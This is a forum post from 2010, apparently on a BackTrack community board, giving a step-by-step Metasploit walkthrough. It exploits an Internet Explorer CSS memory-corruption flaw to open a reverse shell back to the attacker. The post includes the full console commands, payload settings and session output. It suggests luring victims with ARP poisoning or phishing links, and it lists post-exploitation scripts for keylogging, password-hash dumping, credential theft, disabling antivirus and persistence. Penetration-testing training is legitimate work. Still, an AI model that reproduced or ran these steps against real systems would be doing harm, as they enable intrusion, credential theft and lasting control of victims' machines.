Results 1 to 10 of 17

Thread: My Metasploit tutorial thread

Threaded View

  1. #1
    Senior Member iproute's Avatar
    Join Date
    Jan 2010
    Location
    Midwest, USA
    Posts
    192

    Default My Metasploit tutorial thread

    For those beginners, much of this stuff can be found in some good resources I will cite later. Please leave comments on things you'd like to see inlcuded or corrections that may need to be made. Currently this post is a work in progress

    This demonstration uses the new "windows/browser/ms10_xxx_ie_css_clip"
    More info available from Exploit-db New IE6,7,8 mem corruption


    Common msfconsole tasks;
    first of course open a terminal and issue the command
    Code:
    root@bt:~#msfconsole
    Then there are some basics like searching for exploits. A more detailed description of a given exploit from within the framework, selecting a payload, running the exploit, some of the simple automation that can be done, and other oddities. Here we will look for exploits that are 2010 microsoft security advisories.
    Code:
    search ms10
    Next, maybe we want to know more about a given exploit; This information looks similar to what is found on the advisories and maybe even on Exploits Database by Offensive Security, but includes things like the options that can be set.
    Code:
    info windows/browser/ms10_xxx_ie_css_clip
    now we will load up an exploit we'd like to try.
    Code:
    use windows/browser/ms10_xxx_ie_css_clip
    We need to configure our exploit options for it to work of course. I like to select payloads first. Not all payloads work with all exploits. Too keep things simple the metasploit developers have designed the framework so that once you have selected the exploit you would like to use, if you issue the command below(show payloads) the framwork will only show the payloads that work for your selected exploit.
    Code:
    msf exploit(ms10_xxx_ie_css_clip) > show payloads
    Remember the info command we used with exploits? Well it works with payloads too. Take some time to familiarize yourself with the payloads metasploit has to offer.
    Code:
    msf exploit(ms10_xxx_ie_css_clip) > info windows/shell/reverse_tcp
    Lets go ahead and select a payload to use.
    Code:
    msf exploit(ms10_xxx_ie_css_clip) > set payload windows/shell/reverse_tcp
    Now we need to configure our options. Lets take a look at what options we have.
    Code:
    msf exploit(ms10_xxx_ie_css_clip) > show options
    ok, lets set things up!
    Code:
    msf exploit(ms10_xxx_ie_css_clip) > set lhost 192.168.1.105
    msf exploit(ms10_xxx_ie_css_clip) > set lport 31337
    msf exploit(ms10_xxx_ie_css_clip) > set uripath /
    msf exploit(ms10_xxx_ie_css_clip) > set srvport 80
    The uripath options sets the directory the malicious webserver will be located. Root directory keeps it simple. srvport sets the webserver port to 80, also making this vector simpler to perform. Please refer to other documentation for the other options such as the excellent
    Metasploit Unleashed Information Security Training
    Here is where you might want to include some automation or set some of the other features. To view advanced options available, issue the following command;
    Code:
    show advanced
    A couple of interesting advanced options are AutoRunScript and InitialAutoRunScript.
    Please refer to the section 10 (meterpreter scripting) of the MSF unleashed course for more information on which scripts are available.
    Another way is to issue the follow command in your terminal(not in the framework console)
    Code:
    root@bt:~# ls /pentest/exploits/framework3/scripts/meterpreter/
    arp_scanner.rb           enum_putty.rb            getcountermeasure.rb      multi_meter_inject.rb   remotewinenum.rb                 webcam.rb
    autoroute.rb             enum_shares.rb           getgui.rb                 multicommand.rb         scheduleme.rb                    win32-sshclient.rb
    checkvm.rb               enum_vmware.rb           gettelnet.rb              multiscript.rb          schtasksabuse.rb                 win32-sshserver.rb
    credcollect.rb           event_manager.rb         getvncpw.rb               netenum.rb              scraper.rb                       winbf.rb
    domain_list_gen.rb       file_collector.rb        hashdump.rb               packetrecorder.rb       screen_unlock.rb                 winenum.rb
    dumplinks.rb             get_application_list.rb  hostsedit.rb              panda_2007_pavsrv51.rb  search_dwld.rb                   wmic.rb
    duplicate.rb             get_env.rb               keylogrecorder.rb         persistence.rb          service_permissions_escalate.rb
    enum_chrome.rb           get_filezilla_creds.rb   killav.rb                 pml_driver_config.rb    srt_webdrive_priv.rb
    enum_firefox.rb          get_local_subnets.rb     metsvc.rb                 powerdump.rb            uploadexec.rb
    enum_logged_on_users.rb  get_loggedon_users.rb    migrate.rb                prefetchtool.rb         virtualbox_sysenter_dos.rb
    enum_powershell_env.rb   get_pidgin_creds.rb      multi_console_command.rb  process_memdump.rb      vnc.rb
    The two autorunscript options allow your session to perform scripted tasks as soon as the session begins. Things like making a meterpreter session persistent, or beginning a keylogger immediately, migrating your session to another process, or even chaining multiple commands are possible. You'll want to do some studying and experimenting with what automation you find works for you.
    Now we need to run our exploit. I like the -j option as it backgrounds the exploit process so you can continue to work in the framework console.
    Code:
    exploit -j
    Now find a creative way to lure your victim to your malicious website in this case since the exploit we've selected here is a client side. You could use ARP poisoning or a phishing style attack with the link. Be inventive! I am just using a simple not updated windows XP SP3 machine running on my LAN in Virtualbox, so I will just browse there myself. In my victim's web-browser I simply entered my attackers IP
    Code:
    http://192.168.1.105/
    Well we got a session!. Here is some output from my msfconsole
    Code:
    msf exploit(ms10_xxx_ie_css_clip) > exploit -j
    [*] Exploit running as background job.
    
    [*] Started reverse handler on 192.168.1.105:31337 
    [*] Using URL: http://0.0.0.0:80/
    [*]  Local IP: http://192.168.1.105:80/
    [*] Server started.
    msf exploit(ms10_xxx_ie_css_clip) >[*] Sending Internet Explorer CSS SetUserClip Memory Corruption to 192.168.1.147:1053 (target: Internet Explorer 6)...
    [*] Sending stage (240 bytes) to 192.168.1.147
    [*] Command shell session 1 opened (192.168.1.105:31337 -> 192.168.1.147:1055) at 2010-11-14 11:34:44 -0600
    [*] Session ID 1 (192.168.1.105:31337 -> 192.168.1.147:1055) processing InitialAutoRunScript 'migrate -f'
    [-] Error: Command shell sessions do not support migration
    In this case we are using a simple reverse shell and not a meterpreter. The migration error is ok, as migrate is a meterpreter script. Some instances maybe you could only begin with a shell due to payload limitations an exploit has. No problem. Here is what I like to do

    Turning windows shells into meterpreter sessions the easy way.
    First, lets list our sessions. Then we'll take a look at the options the sessions command has, since there is one we like a lot.
    Code:
    msf exploit(ms10_xxx_ie_css_clip) > sessions
    
    Active sessions
    ===============
    
      Id  Type   Information  Connection
      --  ----   -----------  ----------
      1   shell               192.168.1.105:31337 -> 192.168.1.147:1055
    
    msf exploit(ms10_xxx_ie_css_clip) > sessions -h
    Usage: sessions [options]
    
    Active session manipulation and interaction.
    
    OPTIONS:
    
        -K        Terminate all sessions
        -c <opt>  Run a command on the session given with -i, or all
        -d <opt>  Detach an interactive session
        -h        Help banner
        -i <opt>  Interact with the supplied session ID
        -k <opt>  Terminate session
        -l        List all active sessions
        -q        Quiet mode
        -s <opt>  Run a script on the session given with -i, or all
        -u <opt>  Upgrade a win32 shell to a meterpreter session
        -v        List verbose fields
    that -u options is pretty sweet. Lets go ahead and upgrade our shell to a meterpreter. FYI, It did not work in this instance, possibly because the shell we are using is also a reverse connection. I will edit this thread later with the correct updates. Anyway the update a shell command is;
    Code:
    msf exploit(ms10_xxx_ie_css_clip) > sessions -u 1
    EDIT: I didn't get the thread edited with the upgrade working, but I have made a video of using the spoolss exploit with a reverse shell payload, then upgraded that. I've also shown the makerc command, and the migrate meterpreter script. Migrate should be covered elsewhere and is a mostly simple concept. To understand when migrate is not simple, watch the megaprimer series.
    Makerc is useful as it will generate a metasploit resource file(akin to a bash script for metasploit almost) of all the commands used in that session. Good automation tool. I will show using resource files later on, and they are also covered in the MSF unleashed course
    m10_061_spoolss demo
    ...continued....
    Last edited by iproute; 11-16-2010 at 01:49 AM.

Similar Threads

  1. [Tutorial] Curso Metasploit Framework (traduzido)
    By rafaeltorresrj in forum Tutoriais e Howtos
    Replies: 8
    Last Post: 08-08-2010, 01:42 AM
  2. Metasploit auxilary file_autopwn module - Video Tutorial
    By brtw2003 in forum BackTrack Videos
    Replies: 5
    Last Post: 03-13-2010, 11:20 AM
  3. Tutorial Request Thread
    By KMDave in forum Tutorials und Howtos
    Replies: 20
    Last Post: 01-20-2010, 03:04 AM
  4. Metasploit problem with getting a tutorial to work
    By sertas in forum OLD BackTrack 4 General Support
    Replies: 1
    Last Post: 07-18-2009, 01:03 PM
  5. Metasploit 3 tutorial for beginner?
    By LLO6969 in forum OLD Newbie Area
    Replies: 2
    Last Post: 01-13-2008, 10:48 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •